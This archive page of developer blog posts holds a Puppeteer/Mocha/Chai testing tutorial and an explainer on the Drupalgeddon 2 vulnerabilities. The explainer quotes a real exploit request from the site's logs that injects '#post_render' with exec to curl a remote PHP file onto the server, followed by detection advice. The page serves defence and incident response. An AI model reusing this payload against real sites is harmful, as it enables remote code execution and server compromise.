Kevin Guebert Archives - Outside Online

Testing with Puppeteer - Part 1

In a previous post on the Outside Developer Blog, we talked about our development workflow and how it includes a testing process. Over the past couple of months, we’ve been experimenting with making our testing process more efficient and more helpful for our developers. In our research, we came across a tool from Google called Puppeteer, “a high level API to control Chrome or Chromium over the DevTools Protocol.” In more basic terms, Puppeteer allows you to do anything you would do manually in Chrome but through code. Need a screenshot? Want to test form inputs? Need to test your web speed? Puppeteer can do all that and more.
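As a quick illustration of what that looks like in practice (the URL and filename below are just placeholders, not part of our actual suite), a handful of lines is enough to load a page headlessly and capture a screenshot of it:

const puppeteer = require('puppeteer');

(async () => {
  // Launch headless Chromium, open a tab, load a page, and save a screenshot.
  const browser = await puppeteer.launch({ headless: true });
  const page = await browser.newPage();
  await page.goto('https://example.com', { waitUntil: 'networkidle2' });
  await page.screenshot({ path: 'example.png', fullPage: true });
  await browser.close();
})();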

Our tests used to be built with CasperJS, a tool that ran on top of a headless browser. Our experience with Casper was unfortunately troublesome, with tests failing for no apparent reason and inconsistent results across runs. Our tests became so finicky that we started commenting out tests we knew succeeded in the browser but failed under Casper. We still needed our builds to pass, but Casper was no longer a reliable source of information about which tests were passing or failing. This was obviously not a good sign, bad practice, and a recipe for trouble down the line.

After experimenting and researching Puppeteer, we arrived at two questions:

  1. Should we change our tests from Casper to Puppeteer?

  2. Would Puppeteer be better and thus worth the switch?

As a team we decided it would at least be worth implementing one of our tests in Puppeteer and viewing the results.

Puppeteer + Mocha + Chai

For our test, we decided that Puppeteer would be the headless browser instance, and Mocha and Chai would help us with assertions. Mocha and Chai are JavaScript libraries that help determine whether an assertion passes or not. For example, we assert that the homepage has the title “Outside Online.” Mocha runs the test, and Chai checks the result against the expectation and returns true or false. Each test instantiates a headless Chrome instance using Puppeteer and uses Mocha and Chai to run the assertions.
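As a minimal sketch of that division of labor (the hard-coded title below is a stand-in – in our real suite the value comes from a Puppeteer page via page.title()), a Mocha test using Chai's expect looks roughly like this:

const { expect } = require('chai');

describe('Homepage', function () {
  it('has the expected title', function () {
    // Mocha runs the test; Chai compares the actual value to the expectation.
    const title = 'Outside Online'; // stand-in for await page.title()
    expect(title).to.eql('Outside Online');
  });
});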

Results

Getting started with Puppeteer, Mocha, and Chai proved to be extremely straightforward. We were able to convert a previously failing Casper test into a working Puppeteer test within a few hours. Once we had one test suite running, we converted all of our tests to Puppeteer and removed Casper from our process. In this shift, we were also able to give developers more tools for debugging failing tests. Puppeteer has the option to run Chrome in a non-headless state, so a browser window opens with the test parameters and lets a developer interact with the test. We also implemented a screenshot workflow that captures the webpage for any failing test. Both of these options are simple parameters passed to the testing script. Our experience so far has been positive, and we look forward to diving deeper into Puppeteer.

Be sure to check out Part 2 to learn how we implemented Puppeteer, Mocha, and Chai to create our new test suite.

Creating Tests with Puppeteer: Part 2

In our last post about implementing tests with Puppeteer, we gave a high-level overview of some of the decisions that led us to switch from Casper to Puppeteer. In this post, we are going to walk through the code that makes our tests work.

Goals

At the end of this tutorial, we will have a fully working test that implements Puppeteer, Mocha, and Chai for Outside Online.

Initialization

  1. Let’s first start with creating a new folder in the directory of your choosing.

  2. Inside this folder, run npm init – feel free to name it however you like and fill in any values you prefer; there is nothing special about this step.

  3. Next, we need to install 4 modules. Two of them are devDependencies and two are regular dependencies:

npm install --save lodash puppeteer
npm install --save-dev mocha chai

I did not mention lodash in the previous post, but it is a utility library that we will use minimally.
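Lodash is not required for the basic test below; as one hypothetical example of the kind of small utility work it is handy for, you could use it to pluck a command-line flag out of process.argv:

const _ = require('lodash');

// Hypothetical example: find a "--url=..." flag among the command-line arguments.
const urlArg = _.find(process.argv, (arg) => _.startsWith(arg, '--url='));
const baseURL = urlArg ? urlArg.split('=')[1] : 'http://localhost';
console.log(baseURL);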

  4. After installation completes, create an empty bootstrap.js file in the base directory – we will use it to bootstrap our tests.

  5. Lastly for initialization, we need to modify package.json to run mocha correctly:


...
"scripts": {
	"test": "mocha bootstrap.js"
}
...
  6. In your terminal, if you run npm test you should get an output saying 0 passing. This is exactly what we want – it signals everything is correctly installed and mocha is running.

Bootstrapping the Tests

The next thing we need to do is bootstrap all of our tests with puppeteer.

  1. Head back to your text editor and open up the bootstrap.js file.

  2. We now need to import the libraries we installed:


const puppeteer = require('puppeteer');
const { expect } = require('chai');
const _ = require('lodash');
  3. One of the benefits of using mocha is that we can define before and after functions that run before and after our test suite – ideal for setup and cleanup.

  4. We are going to create a before function to set up Puppeteer:


before (async function () {
	global.expect = expect;
	global.browser = await puppeteer.launch({headless: true});
});

The before function does two things – it sets up expect as a global variable to use in all of our tests, and it creates a Puppeteer browser instance that we can reuse. We do this so we are not creating a new browser for each test; we use a single one.

  5. Inside of launch() for Puppeteer we are passing in the option headless: true. This flag determines whether Chrome launches a visible browser window or not. For now, we are keeping it headless, but if you wanted to see an actual Chrome browser open up and run, you would set it to false.

  6. Now for our after function, we are just going to do a little cleanup:


after (function () {
	browser.close();
});

All this does is close the Puppeteer browser instance we created.

Creating Your First Test

  1. With all the setup work now complete, we can create our first test! For this test, we are going to keep it really simple and make sure that Outside's homepage has the correct title.

  2. Before we get started, check out the Mocha documentation for some examples of how to write tests.

  3. Next, go ahead and create a directory within your project called test

  4. Inside the test directory, create a new file called homepage.spec.js – this will be the file where we write our homepage tests.

  5. To start our test inside homepage.spec.js, we have to describe it:


describe('Homepage Test', function() {
});
  6. In the previous section we set up the base bootstrap for all tests. Now, we need to set up a before function that handles what should happen before the tests are run. In this scenario it needs to:

    • Open a new tab

    • Go to a specific URL

  7. Within the describe function, let's create the before initialization:


before (async () => {
	page = await browser.newPage();
	await page.goto('https://www.outsideonline.com', { waitUntil: 'networkidle2' });
});
  8. With the before successfully created, we can now write our test right below the before function!


it("should have the title", async () => {
	expect(await page.title()).to.eql("Outside Online")
});

The above test should read almost like a sentence – we “expect” the page title to equal “Outside Online.” Pretty simple, right?
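If you want to experiment further, the same pattern extends to other assertions. These two are optional extras, not something the rest of the tutorial depends on, and the selector and link path are assumptions about the page rather than guarantees – they would go inside the same describe block in homepage.spec.js:

it("should have a main navigation", async () => {
	// page.$ resolves to null when nothing on the page matches the selector.
	expect(await page.$('nav')).to.not.be.null;
});

it("should link to the contact page", async () => {
	const hrefs = await page.$$eval('a', links => links.map(a => a.getAttribute('href')));
	expect(hrefs).to.include('/contact-us');
});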

Finalizing Our Test

  1. With our test complete, we just need to do one more thing – update our package.json script.


...
"scripts": {
	"test": "mocha bootstrap.js --recursive test/ --timeout 30000"
}
...

  2. We added two more parameters to the test script:

    • The --recursive test/ parameter tells mocha to look into the test/ folder and recursively run all tests that it finds. For us that is only one test, but you can imagine a folder full of subfolders and tests that all need to be run.

    • The --timeout 30000 parameter sets the mocha timeout to 30 seconds instead of the default 2000ms. This is important because it takes some time for Puppeteer to launch; without it, the tests would time out before the browser even opened!

  3. With that now complete, we can run our tests with a simple npm test.

  4. We should now see that the test has run correctly and that the Outside homepage has the title “Outside Online”.

  5. If you want to double check that it is working, go back to homepage.spec.js and change the title to expect something else, like “Welcome to Outside”:


it("should have the title", async () => {
	expect(await page.title()).to.eql("Welcome to Outside")
});
  6. If we do that and rerun the tests, we should see that it has failed. Congratulations, you are up and running!

If you’ve run into any errors or problems, visit the gist to compare your code. Be sure to check out Part 3 of this series to learn how to pass custom parameters to your tests and generate screenshots for failing tests!

Customizing Puppeteer Tests: Part 3

In our previous two posts, we talked about why we switched to Puppeteer and how to get started running tests. Today, we are going to work on customizing tests by passing in custom parameters.

Reasons for Custom Parameters

We need to be able to pass in custom parameters for debugging and local testing. Our tests currently run through Travis CI, but if a developer needs to run the tests locally, the options are not exactly the same.

  • The URL for the test will be different

  • The developer usually needs to debug the tests to determine why they failed

We implemented three custom parameters to help with this problem:

  1. Ability to pass in a custom URL

  2. Ability to run Chrome in a non-headless state

  3. Ability to have screenshots taken of failing tests

We are going to go through all of these custom parameters and learn how to implement them.

Pass in a Custom URL

At Outside, we run our tests both on a development Tugboat environment and on our local machines. The two base URLs for these environments differ, but the paths to specific pages do not. For example, our local machines point to http://outside.test while our Tugboat environments get a unique URL for each build.

We are going to pass a parameter that looks like this: --url={URL}. For our local site, the full command ends up being npm test -- --url=http://outside.test.

Let's get started in setting this up.

  1. We need to set up a variable containing the base URL that is accessible across all files. In bootstrap.js, inside the before function, we are going to name the variable baseURL:


before (async function () {
  ...
  global.baseURL = 'https://www.outsideonline.com';
  ...
});
  2. Now we need to access, inside the before function, the arguments that are passed in from the command line. In JavaScript, these arguments are stored in process.argv. If we console.log them real quick, we can see everything we have access to:


global.baseURL = 'https://www.outsideonline.com';
console.log(process.argv);
  3. Head back to your terminal and run npm test -- --url=https://www.outsideonline.com. You should see an array of values printed:


[ '/usr/local/Cellar/node/10.5.0_1/bin/node',
  'bootstrap.js',
  '--recursive',
  'test/',
  '--timeout',
  '30000',
  '--url=https://www.outsideonline.com' ]
  4. From the above array, we can see that our custom parameter is the last element. But don't let that fool you! We cannot guarantee that the URL will always be the last parameter in this array (remember, we have two more custom parameters to create), so we need a way to loop through this list and retrieve the URL.

  5. Inside before in bootstrap.js, we are going to loop through all the parameters and find the one we need by the url key:


for (var i = 0; i < process.argv.length; i++) {
  var arg = process.argv[i];
  if (arg.includes('--url')) {
    // This is the url argument
  }
}
  6. In the above loop, we set arg to the current iteration value and then check whether that string includes url in it. Simple enough, right?

  7. Now we need to set global.baseURL to the url passed in through the npm test command. However, note that the url argument right now is the whole string --url=www.outsideonline.com, so we need to modify our code to retrieve only www.outsideonline.com. To do that, we split the string at the equals sign using the JavaScript function split, which creates an array of the values before and after the delimiter. In our case, splitting --url=www.outsideonline.com with arg.split("=") will return ['--url', 'www.outsideonline.com'], so the URL will be at index 1 of the resulting array.


if (arg.includes('url')) {
  // This is the url argument
  global.baseURL = arg.split("=")[1];
}
  8. Now that we have our URL, we need to update our tests to use it.

Open up homepage.spec.js – we are going to edit the before function there:


before (async () => {
  page = await browser.newPage();
  await page.goto(baseURL + '/', { waitUntil: 'networkidle2' });
});
  9. We are also going to keep our test from the previous post on Puppeteer:


it("should have the title", async () => {
  expect(await page.title()).to.eql("Outside Online")
});

  10. Now, if you run the tests with the url added, it should work as it did previously: npm test -- --url=https://www.outsideonline.com

  11. Let's create another test to show the value of passing the url through a custom parameter. Inside the test folder, create a file called contact.spec.js. We are going to test the "Contact Us" page found at /contact-us.

  12. In this test, we are going to make sure the page has the title "Contact Us" using a very similar method:


describe('Contact Page Test', function() {
  before (async () => {
    page = await browser.newPage();
    await page.goto(baseURL + '/contact-us', { waitUntil: 'networkidle2' });
  });

  it("should have the title", async () => {
    expect(await page.title()).to.eql("Contact Us | Outside Online")
  });
});

As you can see above, using the baseURL, it is very easy to change the page you want to test based on the path. If for some reason we needed to test in our local environment, we only have to change the --url parameter to the correct base URL!

View a Chrome Browser during Tests (non-headless)

Having the ability to visually see the Chrome browser instance that tests are running in helps developers quickly debug any problems. Luckily for us, this is an easy flag we just need to switch between true and false.
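A related launch option worth knowing about (not something this series relies on, just a standard Puppeteer option that pairs well with a visible browser) is slowMo, which slows every Puppeteer operation down so you can actually watch what the test is doing:

// Inside the launch call: slows each Puppeteer operation by 250ms - handy when watching a headful run.
const browser = await puppeteer.launch({ headless: false, slowMo: 250 });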

  1. The parameter we are going to pass in is --head to indicate that we want to see the browser (headless mode is the default, so we only need a flag to turn it off).

  2. Our npm test script will now look something like this:

npm test -- --url=https://www.outsideonline.com --head

  3. Inside of before in bootstrap.js, we need to update that for loop we created before to also check for the head parameter:


global.headlessMode = true;
for (var i = 0; i < process.argv.length; i++) {
  var arg = process.argv[i];
  if (arg.includes('url')) {
    // This is the url argument
    global.baseURL = arg.split("=")[1];
  }
  if (arg.includes("--head")) {
    global.headlessMode = false;
    // Turn off headless mode.
  }
}
  4. In this instance, we only need to check whether the parameter exists to switch a flag! We use the headlessMode variable to determine what gets passed into the puppeteer launch command:


global.browser = await puppeteer.launch({headless: global.headlessMode});
  5. Lastly, if we are debugging the browser, we probably do not want it to close after the tests are finished – we want to see what it looks like. So inside the after function in bootstrap.js we just need a simple if statement:


if (global.headlessMode) { 
  browser.close();
}
  6. And that's it! Go ahead and run npm test -- --url=https://www.outsideonline.com --head and you should see the tests run in a browser!

Take Screenshots of Failing Tests

Our last custom parameter helps us view screenshots of failing tests. Screenshots can be an important part of the workflow to quickly debug errors or capture the state of a test. This is going to look very similar to the head parameter: we are going to pass a --screenshot parameter.

  1. Let's again update before in bootstrap.js to take in this new parameter:


if (arg.includes("screenshot")) {
  // Enable screenshots for failing tests.
  global.screenshot = true;
}
  2. Next up, we are going to implement another mocha hook – afterEach. afterEach runs after each test, and inside the function we can access details about the test that just ran – mainly, whether it failed or passed. If it failed, we know we need a screenshot. The afterEach function can go in bootstrap.js because all tests we create will be using this:


afterEach (function() {
  if (global.screenshot && this.currentTest.state === 'failed') {
    global.testFailed = true;
  }
});
  3. After a test has failed, we now have a global testFailed flag to trigger a screenshot in that specific test. Note – bootstrap.js does not have all the information for a test, just the base setup. We need to let the individual test files know when we need a screenshot of a failed test so we get a picture of the right page.

  4. Head back to homepage.spec.js, where we are going to implement an after function:


after (async () => {
  if (global.testFailed) {
    await page.screenshot({
      path: "homepage_failed.png",
      fullPage: true
    });
    global.testFailed = false;
    await page.close();
    process.exit(1);
  } else {
    await page.close();
  }
});
  5. The above function checks whether the test has failed based on the testFailed flag. If the test failed, we take a full-page screenshot, reset the flag, close the page, and exit the process.

  6. Unfortunately, the above code works best inside each test file, so there will be some code duplication across tests (see the sketch after this list for one way to reduce it). The path setting makes sure that no screenshot overwrites another test's screenshot by naming the file after the test. The screenshot will be saved in the base directory that we run the npm test command from.

  7. To test and make sure this works, let's edit homepage.spec.js to expect a different title – like “Outside Magazine”:


it("should have the title", async () => {
  expect(await page.title()).to.eql("Outside Magazine")
});
  8. We know this one will fail, so when we run npm test -- --url=https://cdn.outsideonline.com --screenshot we should get a generated screenshot! Look for a file named homepage_failed.png.
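As promised above, here is one way to cut down on the duplicated after logic. This is only a sketch – the helpers/screenshot.js file and function name are hypothetical, not part of the suite built in this series – but each spec file could delegate its failure screenshot to a small shared module:

// helpers/screenshot.js (hypothetical shared module)
module.exports = async function screenshotOnFailure(page, name) {
  if (global.screenshot && global.testFailed) {
    // Name the file after the test so screenshots never overwrite each other.
    await page.screenshot({ path: `${name}_failed.png`, fullPage: true });
    global.testFailed = false;
  }
  await page.close();
};

// In homepage.spec.js, the after hook then shrinks to:
const screenshotOnFailure = require('../helpers/screenshot');

after(async () => {
  await screenshotOnFailure(page, 'homepage');
});

Note that this simplified sketch leaves out the process.exit(1) call from the original after hook; keep that call if you rely on it to fail the build immediately.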

Recap & Final Thoughts

Adding custom parameters to your npm script is fairly simple once you get the hang of it. From there, you can easily customize your tests based on those parameters. Even with the custom parameters we have created, there is room for improvement – stricter checking of the parameters would be a good first step to rule out unintended use cases. With the custom url, headless mode, and screenshots, our tests are now easier to manage and debug if something ever fails. Check out the Puppeteer, Mocha, and Chai documentation to learn more!
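As one example of what that stricter checking could look like (a sketch only, not code from our suite), the --url value could be validated with Node's built-in URL constructor before any tests run, so a typo fails fast instead of producing confusing test errors:

for (const arg of process.argv) {
  if (arg.startsWith('--url=')) {
    const value = arg.split('=')[1];
    try {
      // new URL() throws on malformed values, e.g. a missing protocol.
      global.baseURL = new URL(value).origin;
    } catch (e) {
      console.error(`Invalid --url value: ${value}`);
      process.exit(1);
    }
  }
}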

Drupalgeddon 2 - What & Why

This past March and April, the Drupal Security Team announced two highly critical security patches: “Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002” and “Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004”. First off, before I go any further, if you operate a Drupal site and have not applied these patches already, please patch your site right now. Unfortunately (and not to get too pessimistic), if your site has any meaningful traffic and the patch has not been applied, your site has most likely already been hacked. If your site was exploited, please start remediation immediately.

Security Patch #1 – SA-CORE-2018-002

If we take a dive into the patch file provided by the Drupal Security Team, we can see two files were edited:

  1. includes/bootstrap.inc
  2. includes/request-sanitizer.inc

In these files, a new line was added to bootstrap.inc that calls into request-sanitizer.inc, and two new functions were added to request-sanitizer.inc:

  1. sanitize
  2. stripDangerousValues

Looking at the flow, a call to the sanitize() function is added to bootstrap.inc to check the parameters being passed through the request. For those parameters, it removes “dangerous values” – hence the name. If you check out the code for Drupal 7.x, you can see that the security patch is fairly small. Don't let the amount of code fool you, though; the implications are massive.
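Conceptually – and this is only a JavaScript sketch of the idea, not Drupal's actual PHP implementation – the new sanitization step walks the incoming request data and strips any key that starts with #, unless that key has been explicitly whitelisted:

// Rough sketch of the idea behind stripDangerousValues (not the real Drupal code).
function stripDangerousKeys(input, whitelist = []) {
  if (typeof input !== 'object' || input === null) return input;
  for (const key of Object.keys(input)) {
    if (key.startsWith('#') && !whitelist.includes(key)) {
      delete input[key]; // drop render-array style keys injected by the request
    } else {
      stripDangerousKeys(input[key], whitelist);
    }
  }
  return input;
}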

The Issue

For all versions 6, 7, and 8 of Drupal, there was a vulnerability in sending data through the Form API – if a property key contains a hash sign (#), the data associated with it would pass through. Why is this an issue? Think about how developers use some of the APIs in Drupal: many of them rely on properties with # signs. Take one look at the Form API reference, and you can see many, many properties marked with a # – #prefix, #markup, #post_render, #pre_render, #type, etc. This means that a hacker could, in theory, craft a GET or POST request to certain URLs, passing in whatever data they wanted. Scary.
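For context, here is roughly what those structures look like – shown as a JavaScript object purely for illustration; in Drupal this is a PHP render array, and the exact properties vary by form:

// Illustrative only: keys beginning with '#' are instructions to Drupal's render
// pipeline. '#post_render' callbacks, for example, run against the rendered output,
// which is exactly what the exploit requests shown later in this post try to abuse.
const passwordForm = {
  name: {
    '#type': 'textfield',
    '#title': 'Username or email address',
    '#required': true,
  },
  '#post_render': [],
};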

Security Patch #2 – SA-CORE-2018-004

SA-CORE-2018-004 piggybacks on the first security patch but has a slightly different use case. If you look at the security advisory you will see “20/25 AC:Basic/A:User/CI:All/II:All/E:Exploit/TD:Default.” The “A:User” part of that score means the exploit requires “user-level access” – in other words, some level of permission is needed before the issue can be exploited. While that may be some relief, it is still highly critical: if a hacker successfully exploited the first security issue, they would easily be able to maneuver past this requirement. Looking at the patch, we can see four impacted files:

  1. bootstrap.inc
  2. common.inc
  3. request-sanitizer.inc
  4. file.module

The main takeaway from this patch is the cleanDestination() function added to request-sanitizer.inc (the file introduced by the first security patch). The purpose of cleanDestination is to “remove the destination if it is dangerous,” per the code comments. The function uses the previously built stripDangerousValues to determine whether the destination is “dangerous.” If it is, it unsets the destination from the request and triggers an error: “Potentially unsafe destination removed from query string parameters (GET) because it contained the following keys: @keys.” This adds another layer of security, alongside stripDangerousValues, to requests sent to Drupal.

Exploitations in the Wild

The question you may be asking yourself now is “will this happen to me?” Yes. Yes, it will.

Back in March, I was the one who had the opportunity to apply the fix to Drupal core – a fairly simple process that took all of five minutes. Thinking about the security patch almost a month later, I decided to do some digging into our logs to see whether anyone had actually attempted to use this exploit on our site. I used references from the SANS Internet Storm Center, a site that “gathers millions of intrusion detection log entries every day,” to pinpoint exactly what to look for. In one of their articles, hackers can be seen trying to manipulate different API calls with the # sign.

As it so happens, Outside Online was targeted with this exploit in the past two weeks.

134.196.51.197 - - [19/Apr/2018:07:24:26 +0000] "POST /category/indefinitelywild/?q=user/password&name[%23post_render][]=exec&name[%23markup]=curl+-o+misc%2fserver.php+https%3a%2f%2fpastebin.com%2fraw%2fhhWU03ih&name[%23type]=markup HTTP/1.1" 200 10326 "-" "Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0"

Looking at that request from our logs above, it already looks very suspicious. There shouldn't be any POST requests going to a category page, especially not a user POST request. Let's clean it up a little:

POST /category/indefinitelywild/?q=user/password&name[#post_render][]=exec&name[#markup]=curl+-o+misc/server.php+https://pastebin.com/raw/hhWU03ih&name[#type]=markup

Immediately there are some suspicious aspects to this request. First off, exec is a PHP function used to execute shell commands. Secondly, the request triggers a curl call to a pastebin URL, which sounds dangerous. Basically, the hacker was trying to execute whatever was in their pastebin: when the post_render callback fired, it would call exec on curl+-o+misc/server.php+https://pastebin.com/raw/hhWU03ih (that is, curl -o misc/server.php <pastebin URL>), which would download the pastebin contents into misc/server.php to be run later. Scary, scary, scary. (Note: I went to the pastebin URL; it has since been removed.)

For the second security patch, we stayed diligent, patched our site as soon as possible, and thankfully didn't see any problems. Fortunately, we had the resources to move that quickly – the second security patch had known exploits in the wild within hours of its release.

What Should You Look For?

Exploit attempts for this issue are most commonly pointed at anything dealing with users. Why? There is one set of forms hackers can assume exists on every Drupal site – user login, user registration, user password reset, and so on. All Drupal sites have users associated with them; otherwise they would be static websites. Hackers use this common denominator instead of searching every site page by page to find a form.

Another thing to look for is any appearance of exec in a URL – that is a request trying to execute code. Lastly, in these requests, the only possible targets are parameters containing the # sign (which usually appears URL-encoded as %23).
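As a rough starting point for that kind of audit (a sketch only – the log path is a placeholder and the patterns should be adapted to your own setup), a few lines of Node can flag request lines worth a closer look:

const fs = require('fs');
const readline = require('readline');

// Placeholder path - point this at your own web server's access log.
const rl = readline.createInterface({
  input: fs.createReadStream('/var/log/apache2/access.log'),
});

rl.on('line', (line) => {
  // '%23' is the URL-encoded '#' used to smuggle render-array keys,
  // and 'exec' in a query string is another strong signal of this exploit.
  if (line.includes('%23') || /[?&][^ "]*=exec\b/.test(line)) {
    console.log('Suspicious request:', line);
  }
});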

If you suspect that your site has been hacked, here are a couple signs and methods that have been shared online:

  1. The most obvious, but still commonly used, approach is to replace the homepage. Some hackers deface the homepage to announce the hack, along with a link to a profile demanding “payment.”

  2. New users added to your site that you don't recognize.

  3. If your code repository is under source control like git, run git status. New PHP files, changes to JS files, and other modifications that you know were not part of your own changes most likely mean hackers were able to access them.

  4. Another sneaky attack is by injecting